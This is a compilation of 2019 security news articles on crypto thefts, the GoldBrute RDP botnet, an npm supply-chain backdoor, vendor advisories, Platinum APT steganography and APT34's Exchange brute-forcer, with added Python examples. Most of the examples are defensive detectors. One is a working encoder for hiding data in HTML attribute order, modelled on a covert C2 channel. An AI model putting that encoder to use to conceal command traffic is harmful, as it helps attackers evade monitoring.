A new cyber heist made the headlines: crooks stole 3.2 million Ripple coins (XRP), worth nearly $10 million, from users of the GateHub cryptocurrency wallet service.

“Recently, we have been notified by our customers and community members about funds on their XRP Ledger wallets being stolen and immediately started monitoring network activity and conducted an extensive internal investigation.” reads a preliminary statement published by GateHub.

“Although we have not identified any action or omission by GateHub that may have facilitated or allowed this apparent theft to occur, we apologize deeply to all of our customers for this issue and pledge to get to the bottom of it.”


The company speculates that the attackers might have abused its API to steal the funds. GateHub explained that each API request to the victims’ accounts was authorized with a valid access token. The company did not observe suspicious logins or evidence of brute-force attacks; however, its staff noticed an increased number of API calls using valid access tokens.

The suspicious requests originated from a small number of IP addresses. At the time of writing, it is still unclear how the attackers decrypted the secret keys. The company disabled all access tokens on June 1, after which the suspicious calls stopped.

“We have however detected an increased amount of API calls (with valid access tokens) coming from a small number of IP addresses which might be how the perpetrator gained access to encrypted secret keys,” continues the statement.

“That, however, still doesn’t explain how the perpetrator was able to gain other required information needed to decrypt the secret keys. All access tokens were disabled on June 1st after which the suspicious API calls were stopped,”

Thomas Silkjær, one of the community members who warned GateHub about the theft, published a report on the incident that states:

“On June 1 we were made aware of a theft of 201,000 XRP … and immediately started investigation. It turned out that the account robbed was managed through Gatehub.net, and that the offending account (r9do2Ar8k64NxgLD6oJoywaxQhUS57Ck8k) had stolen substantial amounts from several other XRP accounts, likely to be or have been managed through Gatehub.net.” reads the report.

The experts identified several other accounts connected to the cyber heists, for a total of 12 primary suspect accounts.

“From analysing access logs by victims and transactions made on the XRP ledger, it does not appear that any accounts were breached on gatehub.net directly, using client login credentials.” states the researcher.

The community member was not able to determine the root cause of the hack; he explored various options, including repeated nonces, bad practices in handling the RippleTrade migration of user accounts, browser client hacking, and the leak of an old database containing encrypted private keys.

GateHub immediately notified law enforcement; the investigation is still ongoing.

Pierluigi Paganini

(SecurityAffairs – hacking, GateHub)

The post Crooks stole about $10 million from GateHub cryptocurrency wallet service appeared first on Security Affairs.

New GoldBrute Botnet is attempting to infect 1.5 Million RDP Servers

A new botnet tracked as GoldBrute is scanning the web for Windows machines with Remote Desktop Protocol (RDP) connection enabled.

A new botnet tracked as GoldBrute has appeared in the threat landscape; it is scanning the web for Windows machines with the Remote Desktop Protocol (RDP) enabled.

The botnet is currently targeting over 1.5 million unique endpoints online and is used to brute-force RDP connections or to carry out credential stuffing attacks.

“This botnet is currently brute forcing a list of about 1.5 million RDP servers exposed to the Internet. Shodan lists about 2.4 million exposed servers [1]. GoldBrute uses its own list and is extending it as it continues to scan and grow.” wrote the researcher Renato Marinho of Morphus Labs, who discovered the bot.

The GoldBrute botnet currently has a single command and control server (104[.]156[.]249[.]231), its bots exchange data with the C2 via AES encrypted WebSocket connections to port 8333. 

Querying the Shodan search engine for systems with RDP enabled it is possible to find roughly 2.4 million machines.

“An infected system will first be instructed to download the bot code. The download is very large (80 MBytes) and includes the complete Java Runtime. The bot itself is implemented in a Java class called GoldBrute” continues the expert.

“Initially, the bot will start scanning random IP addresses to find more hosts with exposed RDP servers. These IPs are reported back to the C&C server. After the bot reported 80 new victims, the C&C server will assign a set of targets to brute force to the bot.” 


Below the complete attack chain:

  • Botnet brute-forces RDP connection and gains access to a poorly protected Windows system.
  • It downloads a big zip archive containing the GoldBrute Java code and the Java runtime itself. It uncompresses and runs a jar file called “bitcoin.dll”.
  • The bot will start to scan the internet for “brutable” RDP servers and send their IPs to the C2 that in turn sends a list of IP addresses to brute force.
  • GoldBrute bot gets different “host + username + password”  combinations.
  • Bot performs brute-force attack and reports result back to C2 server.

According to the researcher, the list of “brutable” RDP targets is rapidly growing, which suggests that the size of the botnet is increasing too.

“Analyzing the GoldBrute code and understanding its parameters and thresholds, it was possible to manipulate the code to make it save all “host + username + password” combinations on our lab machine.” continues the expert.

“After 6 hours, we received 2.1 million IP addresses from the C2 server from which 1,596,571 are unique. Of course, we didn’t execute the brute-force phase. With the help of an ELK stack, it was easy to geolocate and plot all the addresses in a global world map, as shown below.”

[Figure: world map of the geolocated RDP target addresses received from the C2 server]

The GoldBrute botnet is difficult to detect because every bot only launches one password-guessing attempt per victim, so per-source lockout and alerting thresholds never trigger; the brute force only becomes visible when failed logons are aggregated per target across all source addresses.
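To show why per-source rules miss this pattern, here is an added Python example (not from the Morphus Labs report) that builds a constructed set of RDP logon failures, shaped like Windows Security event 4625 with logon type 10, and runs two rules over them: the classic per-source threshold and a per-target rule that counts distinct source addresses failing against one host inside a time window. Hostnames, addresses (RFC 5737 documentation ranges), user names and timestamps are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Set

BASE = datetime(2019, 6, 6, 12, 0, 0)


def make_events() -> List[Dict]:
    """Constructed 4625-style records: {ts, target, src, user, logon_type}."""
    events = []
    # GoldBrute pattern: 40 different bots, one guess each, against srv-rdp01,
    # spread over roughly 26 minutes.
    for i in range(1, 41):
        events.append({"ts": BASE + timedelta(seconds=40 * i),
                       "target": "srv-rdp01", "src": f"203.0.113.{i}",
                       "user": "administrator", "logon_type": 10})
    # Classic single-source brute force against srv-rdp02: 8 guesses in 4 minutes.
    for i in range(8):
        events.append({"ts": BASE + timedelta(seconds=30 * i),
                       "target": "srv-rdp02", "src": "198.51.100.7",
                       "user": "admin", "logon_type": 10})
    # Benign: one user mistyping a password twice.
    for i in range(2):
        events.append({"ts": BASE + timedelta(minutes=5 * i),
                       "target": "srv-rdp03", "src": "192.0.2.10",
                       "user": "alice", "logon_type": 10})
    return events


def _max_in_window(times: List[datetime], window: timedelta) -> int:
    """Largest number of timestamps that fall inside any span of length `window`."""
    times = sorted(times)
    best, j = 0, 0
    for i in range(len(times)):
        while j < len(times) and times[j] - times[i] <= window:
            j += 1
        best = max(best, j - i)
    return best


def per_source_alerts(events, threshold=5, window=timedelta(minutes=10)) -> Set[str]:
    """Classic rule: a single source IP failing `threshold` times within `window`."""
    by_src = defaultdict(list)
    for e in events:
        if e["logon_type"] == 10:  # RemoteInteractive, i.e. RDP
            by_src[e["src"]].append(e["ts"])
    return {src for src, ts in by_src.items() if _max_in_window(ts, window) >= threshold}


def per_target_alerts(events, min_sources=20, window=timedelta(hours=1)) -> Dict[str, int]:
    """Distributed rule: count distinct sources failing against one target inside
    `window`; returns {target: distinct_sources} for targets over the bar."""
    by_target = defaultdict(list)
    for e in events:
        if e["logon_type"] == 10:
            by_target[e["target"]].append((e["ts"], e["src"]))
    alerts: Dict[str, int] = {}
    for target, items in by_target.items():
        items.sort()
        for i in range(len(items)):
            srcs = set()
            for ts, src in items[i:]:
                if ts - items[i][0] > window:
                    break
                srcs.add(src)
            if len(srcs) >= min_sources:
                alerts[target] = len(srcs)
                break
    return alerts


if __name__ == "__main__":
    evs = make_events()
    print(per_source_alerts(evs))   # only the noisy single source; srv-rdp01 is missed
    print(per_target_alerts(evs))   # srv-rdp01 surfaces with 40 distinct sources
```

The threshold of 20 distinct sources per hour is a starting point, not a constant: tune it against the normal number of distinct clients a given RDP host sees, and pair the alert with the list of usernames tried, since a botnet working a credential list will cycle through many accounts while a real user fails on one.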

The report published by Marinho also includes a list of IoCs.

Pierluigi Paganini

(SecurityAffairs – GoldBrute botnet, hacking)

The post New GoldBrute Botnet is attempting to infect 1.5 Million RDP Servers appeared first on Security Affairs.

Cryptocurrency startup Komodo hacks itself to protect its users’ funds from hackers

The cryptocurrency startup Komodo hacked itself to protect the funds of its users and prevent hackers from stealing them by exploiting a flaw in its Agama wallet.

The story I’m going to tell you is amazing: the cryptocurrency startup Komodo hacked itself after discovering a backdoor in its Agama wallet.

Komodo’s Agama Wallet allows users to store KMD and BTC cryptocurrencies, but the presence of a backdoor posed a serious risk to them.


Once it discovered the flaw, the company decided to exploit it itself to protect the funds, beating the hackers to it and moving the funds to a secure location.

“Today, Komodo were made aware of an issue with one of the libraries used by the Agama wallet, potentially putting some user funds at risk.” reads a blog post published by the company.

“After discovering the vulnerability, our Cyber Security Team used the same exploit to gain control of a lot of affected seeds and secure the funds at risk.” 

The experts at the company moved around 8 million KMD and 96 BTC from vulnerable Agama wallets to safe wallets under their control: RSgD2cmm3niFRu2kwwtrEHoHMywJdkbkeF (KMD) and 1GsdquSqABxP2i7ghUjAXdtdujHjVYLgqk (BTC).

The owners of wallets that have not been swept, or that hold assets other than KMD and BTC, have to move all their funds from Agama to a new address as soon as possible. Komodo provided a list of safe wallets and other information on its support page.

Experts pointed out that the Verus version of the Agama wallet is not affected by this vulnerability; its latest version supports Komodo in both lite mode and native mode.

The backdoor in the Agama wallet app was discovered by experts at the security team of the npm JavaScript package repository.

“The attack was carried out by using a pattern that is becoming more and more popular; publishing a “useful” package (electron-native-notify) to npm, waiting until it was in use by the target, and then updating it to include a malicious payload.” reads the post published by the npm, Inc. security team.

The npm security team spotted a supply chain attack: the hackers used a malicious update of the electron-native-notify JavaScript library (version 1.1.6) that included code designed to steal cryptocurrency wallet seeds and other login passphrases.

“The GitHub user sawlysawly published this commit on Mar 8th which added electron-native-notify^1.1.5 as a dependency to the EasyDEX-GUI application (which is used as part of the Agama wallet).” continues the security team at npm.

The experts discovered that the attackers targeted the Agama cryptocurrency wallet, which uses the EasyDEX-GUI application, which in turn loaded the now-malicious electron-native-notify library.

The backdoor was added to the electron-native-notify library on March 8, and it was included in the main Agama wallet on April 13, when Komodo released Agama version 0.3.5.

This means that users who logged in to any version of the Agama wallet after April 13 likely had their wallet credentials compromised.
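The dependency was declared as electron-native-notify^1.1.5, and it is the caret range that let the backdoored 1.1.6 release flow into Agama without any further change to the wallet's own code. The following Python is an added example, not code from npm, Komodo or the Agama project, that implements npm's caret-range rules, resolves a range against a constructed list of published versions, and reports the drift between what a lockfile pinned and what a fresh resolution would pick. The registry state, the declared range and the lockfile contents are constructed for the example.

```python
import re
from typing import Dict, Iterable, Optional, Tuple

Version = Tuple[int, int, int]


def parse_version(text: str) -> Version:
    """Parse a plain semver version such as '1.1.6' (or 'v1.1.6')."""
    m = re.fullmatch(r"v?(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError(f"not a plain semver version: {text!r}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3))


def caret_bounds(spec: str) -> Tuple[Version, Version]:
    """npm caret semantics: allow updates that keep the left-most non-zero
    component fixed. ^1.1.5 -> [1.1.5, 2.0.0), ^0.1.5 -> [0.1.5, 0.2.0),
    ^0.0.5 -> [0.0.5, 0.0.6)."""
    low = parse_version(spec[1:])
    major, minor, patch = low
    if major > 0:
        high: Version = (major + 1, 0, 0)
    elif minor > 0:
        high = (0, minor + 1, 0)
    else:
        high = (0, 0, patch + 1)
    return low, high


def satisfies(version: str, spec: str) -> bool:
    """Supports exact pins ('1.1.5') and caret ranges ('^1.1.5') only."""
    v = parse_version(version)
    if spec.startswith("^"):
        low, high = caret_bounds(spec)
        return low <= v < high
    return v == parse_version(spec)


def resolve(spec: str, published: Iterable[str]) -> Optional[str]:
    """What a fresh install does for a range without a lockfile: take the
    highest published version that satisfies it."""
    candidates = [v for v in published if satisfies(v, spec)]
    return max(candidates, key=parse_version) if candidates else None


def lockfile_drift(locked: Dict[str, str], ranges: Dict[str, str],
                   registry: Dict[str, Iterable[str]]) -> Dict[str, Tuple[str, Optional[str]]]:
    """Compare the versions a lockfile pinned with what the declared ranges
    resolve to now; every dependency that moved comes back as
    {name: (locked_version, fresh_version)}."""
    drift: Dict[str, Tuple[str, Optional[str]]] = {}
    for name, locked_version in locked.items():
        fresh = resolve(ranges[name], registry.get(name, []))
        if fresh != locked_version:
            drift[name] = (locked_version, fresh)
    return drift


# Constructed registry state: per the npm advisory the backdoor shipped in 1.1.6.
REGISTRY = {"electron-native-notify": ["1.1.4", "1.1.5", "1.1.6"]}
RANGES = {"electron-native-notify": "^1.1.5"}   # the range as declared in the commit
LOCKED = {"electron-native-notify": "1.1.5"}    # what a lockfile would have pinned

if __name__ == "__main__":
    print(resolve("^1.1.5", REGISTRY["electron-native-notify"]))   # 1.1.6
    print(resolve("1.1.5", REGISTRY["electron-native-notify"]))    # 1.1.5
    print(lockfile_drift(LOCKED, RANGES, REGISTRY))
```

A committed package-lock.json installed with `npm ci` freezes the resolved version and its integrity hash, so the malicious 1.1.6 would only have entered the build when someone deliberately refreshed the lock; the drift report is the review step that makes such a refresh visible before it is merged.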

The npm experts also published a video that shows how the vulnerable version of the Agama wallet sends the private seed associated with a wallet to a remote server in the background.

Komodo experts used the same technique to transfer the funds of the company clients to a safe wallet before hackers could have stolen them.

Pierluigi Paganini

(SecurityAffairs – Komodo, hacking)

The post Cryptocurrency startup Komodo hacks itself to protect its users’ funds from hackers appeared first on Security Affairs.

The EU’s Embassy In Moscow Was Hacked and Kept It Secret

A “sophisticated cyber espionage event” began in February 2017. Russian entities are said to be behind the attack, a source told BuzzFeed News.

The European Union embassy in Moscow was compromised and information was stolen, according to an internal document leaked by BuzzFeed News.

An ongoing “sophisticated cyber espionage event” was discovered in April, just weeks before the European Parliament elections – but the European External Action Service (EEAS), the EU’s foreign and security policy agency, did not disclose the incident publicly.

Russian entities are believed to be behind the attack, a source who spoke on condition of anonymity told BuzzFeed News.

The EEAS confirmed the cyber attack; asked whether the EU’s foreign policy chief Federica Mogherini was aware of the incident, it stated that the EEAS hierarchy had been informed. “We have observed potential signs of compromised systems connected to our unclassified network in our Moscow Delegation. Measures have been taken and the investigation is in progress — at this stage we cannot comment further,” a spokesperson said.

According to the leaked document, the initial attack took place in February 2017 but was detected only in April of this year. An analysis of the hack revealed activity involving at least two computers and concluded that information had been stolen.

However, officials have no idea what type of information was gathered during the attack. The analysis characterized the intrusion as the work of an Advanced Persistent Threat (APT), a continuous, clandestine and sophisticated operation aimed at gaining access to a system and remaining undetected for a long period of time.

According to the leaked document, these types of attacks are also attempted against other European foreign affairs ministries. The source who told BuzzFeed News that Russian groups were behind the hacking of the EEAS delegation in Moscow also claimed that member states were not informed of the incident.

The EEAS spokesman, however, said that member states were informed “through established channels (cyber defense channels)”.

In view of the May European Parliament elections, the EU took a series of measures to combat cyber attacks, including an action plan against disinformation, citing evidence of ongoing aggression and interference by foreign actors, mainly Russia.

According to BuzzFeed News, some officials claim that the bloc and some European governments are not doing enough to thwart Russian activity because they underestimate or downplay the threat.

In his only public statement as special counsel last month, Robert Mueller said his investigation into Russia’s interference in the 2016 elections revealed that “Russian intelligence officers in the Russian military launched a concerted attack on our political system. They used sophisticated computer techniques to hack computers and networks used by the Clinton campaign.”

He concluded that there were “multiple systematic efforts to interfere in our elections”.

The same group that hacked the Democratic National Committee was also behind a hacking against the German parliament the previous year.


The post The EU’s Embassy In Moscow Was Hacked and Kept It Secret appeared first on .

VMware addressed flaws in its Workstation and Tools

VMware has informed its users that it has patched two high-severity vulnerabilities that affect its Tools and Workstation software.

VMware has patched two high-severity flaws that affect its Tools and Workstation software.

The first security flaw, tracked as CVE-2019-5522, affects VMware Tools 10.x on Windows. The vulnerability is an out-of-bounds read issue in the vm3dmp driver installed in Windows guest machines; it was reported by researchers ChenNan and RanchoIce of Tencent ZhanluLab.

“VMware Tools update addresses an out of bounds read vulnerability in vm3dmp driver which is installed with vmtools in Windows guest machines.  VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.1.” reads the advisory published by VMware.

“A local attacker with non-administrative access to a Windows guest with VMware Tools installed may be able to leak kernel information or create a denial of service attack on the same Windows guest machine,”

The company addressed the vulnerability with the release of VMware Tools 10.3.10; no workarounds are available.

The second issue, tracked as CVE-2019-5525, is a use-after-free bug in the Advanced Linux Sound Architecture (ALSA) backend of Workstation 15.x. An attacker with normal user privileges on the guest machine could exploit it, in conjunction with other vulnerabilities, to execute arbitrary code on the underlying Linux host, a guest-to-host escape.

“VMware Workstation contains a use-after-free vulnerability in the Advanced Linux Sound Architecture (ALSA) backend. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.5.” states the advisory.

“A malicious user with normal user privileges on the guest machine may exploit this issue in conjunction with other issues to execute code on the Linux host where Workstation is installed.”

The company addressed this vulnerability with the release of Workstation 15.1.0 for Linux. The vulnerability, rated “high severity”, was reported by Brice L’helgouarc’h from Amossys.

Pierluigi Paganini

(SecurityAffairs – hacking)

The post VMware addressed flaws in its Workstation and Tools appeared first on Security Affairs.

Remote code execution flaw in Ministra IPTV Platform exposes user data and more

Researchers at security firm CheckPoint have discovered multiple critical vulnerabilities in a popular IPTV middleware platform.

Security experts at CheckPoint have discovered multiple critical flaws in a popular IPTV middleware platform that is used by more than a thousand online media streaming services to manage their millions of subscribers.

Ministra TV platform is a PHP-based middleware platform for media streaming services, it manages Internet Protocol television (IPTV), video-on-demand (VOD) and over-the-top (OTT) content, licenses and their subscribers.

In order to receive the television broadcast, set-top boxes (STBs) connect to Ministra, and service providers use the platform to manage their customers.

The vulnerabilities affect the administrative panel of the Ministra TV platform (formerly Stalker Portal); they could be exploited by an attacker to bypass authentication and access information associated with subscribers.

Another worrying aspect of the discovery is that an attacker could exploit the flaws to broadcast and stream their own content to the devices of the affected networks.

The platform is developed by the Ukrainian company Infomir; most of the providers that use it are located in the United States (199), followed by the Netherlands (137), Russia (120), France (117) and Canada (105).


“About a year ago Check Point Research discovered critical vulnerabilities in a Ukrainian TV streaming platform that, if exploited, could leave service providers exposed to a serious breach.” states a blog post published by Check Point. “The risks would be their entire customer database of personal info and financial details as well as allowing an attacker to potentially stream any content they choose on to the screens of their customer network.”

Check Point researchers discovered a logical vulnerability in the authentication process implemented by the Ministra platform: a function used to authenticate users fails to validate the request, allowing a remote attacker to bypass authentication and then perform SQL injection by exploiting a separate vulnerability.

“[ Ministra] It is PHP based, and like most web-based platforms, it has an admin interface that requires authentication.” continues the experts. “However, we were able to bypass the authentication mechanism and utilize some of the admin AJAX API functions. This led to SQL Injection chained to PHP Object Injection vulnerabilities, effectively allowing us to remotely execute code on the server. “

The experts also demonstrated in a video PoC that it is possible to chain the flaws with a PHP Object Injection issue to remotely execute arbitrary code on the targeted server.

“In this particular case, we used the authentication bypass to perform an SQL Injection on the server,” continues the post. “With that knowledge, we escalated this issue to an Object Injection vulnerability, which in turn allowed us to execute arbitrary code on the server, potentially impacting not only the provider but also the provider’s clients.”

The security experts reported the flaws to the company, that addressed them with the release of Ministra version 5.4.1.

Pierluigi Paganini

(SecurityAffairs – Ministra, hacking)

The post Remote code execution flaw in Ministra IPTV Platform exposes user data and more appeared first on Security Affairs.

Cisco disclosed several flaws in Cisco Industrial Network Director

Cisco disclosed several flaws in its Cisco Industrial Network Director product, including a high severity code execution vulnerability.

Cisco employees discovered several vulnerabilities in the Cisco Industrial Network Director product, including a high severity code execution flaw.

The Cisco Industrial Network Director is used to manage industrial networks; it helps operations teams gain full visibility into the automation network for improved system availability and increased overall equipment effectiveness.

Three flaws were discovered during internal security testing; the most serious one, tracked as CVE-2019-1861, is a remote code execution vulnerability that received a CVSS score of 7.2.


“A vulnerability in the software update feature of Cisco Industrial Network Director could allow an authenticated, remote attacker to execute arbitrary code.” reads the security advisory published by Cisco.

“The vulnerability is due to improper validation of files uploaded to the affected application. An attacker could exploit this vulnerability by authenticating to the affected system using administrator privileges and uploading an arbitrary file. A successful exploit could allow the attacker to execute arbitrary code with elevated privileges.”

The flaw can be exploited by an attacker who authenticates to the target system with administrator privileges and uploads an arbitrary file, and then executes arbitrary code with elevated privileges. The attacker therefore needs valid admin credentials, which limits the exposure to insiders and to attackers who have already compromised an administrative account.

The security hole has been patched with the release of version 1.6.0. Prior versions are impacted.

Another flaw discovered in the Industrial Network Director is a stored cross-site scripting (XSS) issue tracked as CVE-2019-1882. The flaw, rated medium severity, can be exploited remotely by an authenticated attacker to carry out XSS attacks.

“A vulnerability in Cisco Industrial Network Director could allow an authenticated, remote attacker to conduct stored cross-site scripting (XSS) attacks.” reads the Cisco Advisory.

“The vulnerability is due to improper validation of content submitted to the affected application. An attacker could exploit this vulnerability by sending requests containing malicious values to the affected system. A successful exploit could allow the attacker to conduct XSS attacks.”

The third flaw is a cross-site request forgery (CSRF) flaw that could be exploited by an unauthenticated attacker to perform arbitrary actions on the targeted device.

The flaw tracked as CVE-2019-1881 has been rated as medium severity.

“A vulnerability in the web-based management interface of Cisco Industrial Network Director (IND) could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected device.” reads the advisory.

“The vulnerability is due to insufficient CSRF protections for the web-based management interface of the affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to use a web browser and the privileges of the user to perform arbitrary actions on an affected device.”

Pierluigi Paganini

(SecurityAffairs – CISCO, hacking)

The post Cisco disclosed several flaws in Cisco Industrial Network Director appeared first on Security Affairs.

Platinum APT leverages steganography to hide C2 communications

The Platinum cyber espionage group uses a steganographic technique to hide communications with its command and control (C&C) servers.

Experts from Kaspersky have linked the Platinum APT group with cyber attacks involving an elaborate, and new steganographic technique used to hide communications with C2 servers.

The APT group was first documented by Microsoft in 2016; it targeted organizations in South and Southeast Asia. According to Microsoft, Platinum has been active since at least 2009 and was responsible for spear-phishing attacks on ISPs, government organizations, intelligence agencies, and defense institutes.

Judging from the nature of the targeted entities and the group’s TTPs, the hackers do not appear to be financially motivated.

In June 2018, experts at Kaspersky were investigating attacks against diplomatic, government and military entities in South and Southeast Asian countries.

The experts tracked the campaign as EasternRoppels and speculate it may have started as far back as 2012.

“In June 2018, we came across an unusual set of samples spreading throughout South and Southeast Asian countries targeting diplomatic, government and military entities. The campaign, which may have started as far back as 2012, featured a multi-stage approach and was dubbed EasternRoppels.” reads the analysis published by the expert. “The actor behind this campaign, believed to be related to the notorious PLATINUM APT group, used an elaborate, previously unseen steganographic technique to conceal communication.”

The attack chain starts with WMI event subscriptions that run an initial PowerShell downloader, which fetches a small PowerShell backdoor used for system fingerprinting and for downloading additional code.

The initial WMI PowerShell scripts observed in different attacks used different hardcoded command and control (C&C) IP addresses, different encryption keys and salts, and different active hours.

The threat actor hosted the C&C addresses on free hosting services and used a large number of Dropbox accounts to store both the malicious code and the exfiltrated data.

Kaspersky spotted a backdoor while investigating another threat; further analysis allowed its experts to determine that it was a second-stage malware used in one of the Platinum campaigns.

“We were able to find a backdoor that was implemented as a DLL and worked as a WinSock NSP (Nameservice Provider) to survive a reboot. The backdoor shares several features with the PowerShell backdoor described above: it has hardcoded active hours, it uses free domains as C&C addresses, etc.” continues Kaspersky.

The researchers discovered that the same domain was used to store exfiltrated data in the two attacks. The analysis of the encrypted files used in the second stage revealed a previously undiscovered backdoor associated with the Platinum group.

The hackers used a dropper to install the steganography backdoor: the dropper creates directories for the backdoor, saves the backdoor-related files in these folders, runs the backdoor, sets up a persistence mechanism, and then removes itself.

Once installed on a target machine, the backdoor connects to the C&C server and downloads an HTML page that contains embedded commands, encrypted with a key that is also embedded in the page.

“The page contains embedded commands that are encrypted with an encryption key, also embedded into the page. The embedded data is encoded with two steganography techniques and placed inside the <--1234567890> tag (see below).” continues the analysis.


The first steganography technique relies on the fact that HTML is indifferent to the order of tag attributes: the backdoor decodes the page line by line and, from the attribute order, collects the encryption key for the encoded data, which is embedded in the page right after the HTML tags and is itself encoded with a second steganography technique.
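The attribute-order channel works because a browser renders `<span id="a" class="b">` and `<span class="b" id="a">` identically, so a tag with n attributes can carry one of n! values without changing what the page looks like. The following is an added example that illustrates that principle only; it is not Kaspersky's code and not the Platinum encoding, which additionally encrypts the commands and uses a second encoding for the data after the tags. It assumes a hypothetical carrier tag (`span` with the four attributes `class`, `data-v`, `id`, `title`) and ranks each permutation with a Lehmer code, giving one base-24 digit per tag; tags with any other attribute set are ignored, so the carriers can sit inside an ordinary page.

```python
import math
import re

# Hypothetical carrier: a <span> with exactly these attributes. Their sorted order is the "zero"
# permutation; any other ordering encodes a digit. Tags with a different attribute set are ignored.
CARRIER_TAG = "span"
CARRIER_ATTRS = ("class", "data-v", "id", "title")
RADIX = math.factorial(len(CARRIER_ATTRS))      # 24 orderings -> one base-24 digit per tag


def permutation_rank(seq, canonical):
    """Lehmer-code rank (0 .. n!-1) of `seq` among the permutations of `canonical`."""
    remaining = list(canonical)
    rank = 0
    for item in seq:
        i = remaining.index(item)
        rank = rank * len(remaining) + i
        remaining.pop(i)
    return rank


def permutation_unrank(rank, canonical):
    """Inverse of permutation_rank: the mixed-radix digits come out least significant first."""
    digits = []
    for k in range(1, len(canonical) + 1):
        rank, d = divmod(rank, k)
        digits.append(d)
    remaining = list(canonical)
    return tuple(remaining.pop(d) for d in reversed(digits))


def encode(message: bytes) -> str:
    """Hide `message` in the attribute order of a run of otherwise innocuous carrier tags."""
    value = int.from_bytes(b"\x01" + message, "big")   # sentinel byte keeps leading zero bytes
    digits = []
    while value:
        value, d = divmod(value, RADIX)
        digits.append(d)                     # least significant digit goes in the first tag
    tags = []
    for n, d in enumerate(digits):
        order = permutation_unrank(d, CARRIER_ATTRS)
        attrs = " ".join(f'{name}="{name[0]}{n}"' for name in order)   # attribute values are filler
        tags.append(f"<{CARRIER_TAG} {attrs}></{CARRIER_TAG}>")
    return "\n".join(tags)


TAG_RE = re.compile(rf"<{CARRIER_TAG}\s+([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r'([\w-]+)\s*=\s*"[^"]*"')


def decode(html: str) -> bytes:
    """Recover the payload from the attribute order of carrier tags found anywhere in `html`."""
    value = 0
    weight = 1
    for attr_blob in TAG_RE.findall(html):
        names = tuple(ATTR_RE.findall(attr_blob))
        if sorted(names) != sorted(CARRIER_ATTRS):     # not a carrier tag: skip it
            continue
        value += permutation_rank(names, CARRIER_ATTRS) * weight
        weight *= RADIX
    raw = value.to_bytes((value.bit_length() + 7) // 8, "big")
    if not raw.startswith(b"\x01"):
        raise ValueError("no hidden payload found")
    return raw[1:]
```

The defensive corollary is that the channel survives only as long as the HTML is passed through untouched: a proxy that re-serializes the DOM, a minifier, or a content-security gateway that canonicalizes attribute order destroys it, while a signature on the page text never fires because no byte of the payload appears literally.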

The backdoor supports several commands: it can upload, download and execute files, handle requests for lists of processes and directories, upgrade and uninstall itself, and change its configuration file.

The analysis also revealed another tool, a configuration manager that allows the operators to create configuration and command files for the backdoors. The utility can set more than 150 options.

Experts also discovered a P2P backdoor that has many similarities with the previous one: it uses the same command names and the same option names in the configuration files.

“However, there are significant differences, too. The new backdoor actively uses many more of the options from the config, supports more commands, is capable of interacting with other infected victims and connecting them into a network (see the “Commands” section for details), and works with the C&C server in a different way. In addition, this backdoor actively uses logging: we found a log file dating back to 2012 on one victim PC.” continues the analysis.

The backdoor is able to sniff network traffic without keeping any socket in listening mode; it creates a listening socket only when someone attempts to connect.

According to the experts, the backdoor might have been active since at least 2012. 

“We have discovered a new attack by this group and noted that the actors are still working on improving their malicious utility and using new techniques for making the APT stealthier.” concludes Kaspersky. “Finally, based on the custom cryptor used by the actors, we have been able to attribute this attack to the notorious PLATINUM group, which means this group is still active.”

Pierluigi Paganini

(SecurityAffairs – PLATINUM APT, hacking)


Analyzing the APT34’s Jason project

Security expert Marco Ramilli has analyzed the recently leaked APT34 hacking tool tracked as Jason – Exchange Mail BF.

Today I want to share a quick analysis of a newly leaked APT34 tool in order to track similarities between the publicly available APT34 toolsets. This time it is the APT34 Jason – Exchange Mail BF project, leaked by Lab Dookhtegan on June 3, 2019.

Original Leak

Context

According to FireEye, APT34 has been active since 2014. APT34, also referred to as “OilRig” or Helix Kitten, has been known to target regional corporations and industries. Although there was information about APT34 prior to 2019, a series of leaks on Telegram by an individual named “Lab Dookhtegan”, including the Jason project, exposed many names and activities of the organization.

“APT34 conducts cyber espionage on behalf of Iran. Iran seeks to diminish the capabilities of other regional powers to create leverage and better establish itself. This strategy is especially important against nations it sees as a threat to its regional power such as Saudi Arabia and the United Arab Emirates.”

Michael Lortz

Analysis

Jason is a graphical tool implemented to brute-force Microsoft Exchange accounts in order to “harvest” as many emails and account details as possible. Distributed in a ZIP container (a copy is available here), the interface is quite intuitive: the Microsoft Exchange address and its version must be provided (even if a DNS-domain discovery function is available in the code). Three brute-force methods can be selected: EWS (Exchange Web Services), OAB (Offline Address Book) or both (All). Username and password lists can be selected (they are included in the distributed ZIP file) and the number of threads must be provided to balance the attack.
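Both endpoints Jason hammers, EWS and OAB, are served by IIS on the Exchange server, so a brute-force run leaves a trail in the IIS W3C logs as a burst of 401 responses from one client address. The following detection is an added example, not part of Ramilli's analysis or of the leaked tool: it parses the `#Fields:` header, counts 401s against `/EWS/` and `/OAB/` per client in a sliding window, and reports the client addresses that exceed a threshold. The log excerpt is constructed for the example; the `ExchangeServicesClient/...` user agent is the form the EWS Managed API sends by default, which is why it is worth recording alongside the burst.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed IIS W3C excerpt (not a real log). IIS records cs-username as "-" when the request
# is not authenticated, so failed guesses cannot be keyed on the user name; the brute force shows
# up as many 401s against the Exchange endpoints from one client address in a short time.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 8.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2019-06-03 10:15:01 10.0.0.5 POST /EWS/Exchange.asmx - 443 - 203.0.113.7 ExchangeServicesClient/15.00.0913.015 401 1 2148074254 15
2019-06-03 10:15:01 10.0.0.5 POST /EWS/Exchange.asmx - 443 - 203.0.113.7 ExchangeServicesClient/15.00.0913.015 401 1 2148074254 12
2019-06-03 10:15:02 10.0.0.5 POST /EWS/Exchange.asmx - 443 - 203.0.113.7 ExchangeServicesClient/15.00.0913.015 401 1 2148074254 11
2019-06-03 10:15:02 10.0.0.5 GET /OAB/ - 443 - 203.0.113.7 ExchangeServicesClient/15.00.0913.015 401 2 5 9
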